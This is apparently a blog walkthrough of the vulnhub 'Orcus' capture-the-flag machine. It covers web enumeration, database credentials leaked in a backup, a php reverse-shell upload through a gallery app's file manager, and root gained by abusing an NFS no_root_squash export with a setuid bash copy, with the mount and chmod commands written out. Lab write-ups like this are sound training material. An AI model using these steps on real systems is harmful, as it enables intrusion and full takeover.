Enough with the philosophical yadda yaddah.
First I fired up nmap and as in the previous series gazillion services were running.
I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and webapps to follow up. I also fired up dirb to see if i could find any extra folders.
There are so many seemingly vulnerable or actually vulnerable web apps especially in the /external/ directory I'll never know for sure so naturally I spent a long time here (so many wild goose chases).
At this URL http://172.16.94.136/backups/ I downloaded the SimplePHPQuiz-Backupz.tar.gz but didnt have the permissions to download the ssh-creds.bak. I some how already knew it wouldnt amount to much. I extracted the the folder and went to the configs folder and found database credentials.
<?php
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');
@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (mysqli_connect_error()){
echo "Could not connect to MySql. Please try again";
exit();
}
?>
With this I immediately went to the http://172.16.94.136/phpmyadmin/ and logged in. Boom!!Now we have credentials to phpmyadmin all that is left is write a shell using mysql browse to it then get a shell.....
except it didnt happen that way as the credentials didn't have write permission to the web root. It didnt even have FILE permissions. The VM is loaded with a few databases so I decided to try one by one to see if there were backends to other webapps that we hadnt got in the enumeration phase. We were thanked with the /zenphoto/ folder which was an app that was missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from the SimplePHPQuiz-Backupz.tar.gz and successfully installed it.
At this point the plan was to find a point to upload a webshell and get a reverse connection. I did this by
Go to Upload tab--> Click Files (elFinder)--> Zen photodata, Right click on the on the pane on the right, Click --> create new text and then copy everyones favorite php-reverse-shell
After copying it, right click edit and then change the file extension to php, then right click again and then click Open. (remember to have set up a netcat listener). Then we'll get a limited reverse-shell.
With the first flag in the bag let try and root on this box. It took me a while to root this box. I kept going away trying privilege escalation exploits. Until today morning I came back to my nmap scans and found this
2049/tcp open nfs_acl 2-3 (RPC #100227)
wonder why that didn't stick out to me in the first place. I quickly run showmount.
root@kali:/tmp# showmount -e 172.16.94.136 Export list for 172.16.94.136: /tmp *
I then checked /etc/exports file and found that the NFS shares were configured with no_root_squash
www-data@Orcus:/$ cat /etc/exports cat /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /tmp *(rw,no_root_squash)
On our kali box, we mount the partition
root@kali:~# rm -rf /mnt/orcus/ root@kali:~# mkdir /mnt/orcus root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus root@kali:~# touch /mnt/orcus/rooter root@kali:~# chmod 777 /mnt/orcus/rooterOn our limited shell on Orcus we copy our bash shell into our newly created world writable /tmp/rooter
www-data@Orcus:/$ cp /bin/bash /tmp/rooterwe head back to our Kali box and set the seguid bit on the /tmp/rooter file (shell)
root@kali:~# chmod 4777 /mnt/orcus/rooterwe head into the the /tmp folder and check to make sure the the bit has been set and then execute the rooter with the -p option in order to preserve the previleges which gets us root privileges. :-)
It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and ofcourse g0tmi1k and the whole vulnhub community who keep the war games coming.
No comments:
Post a Comment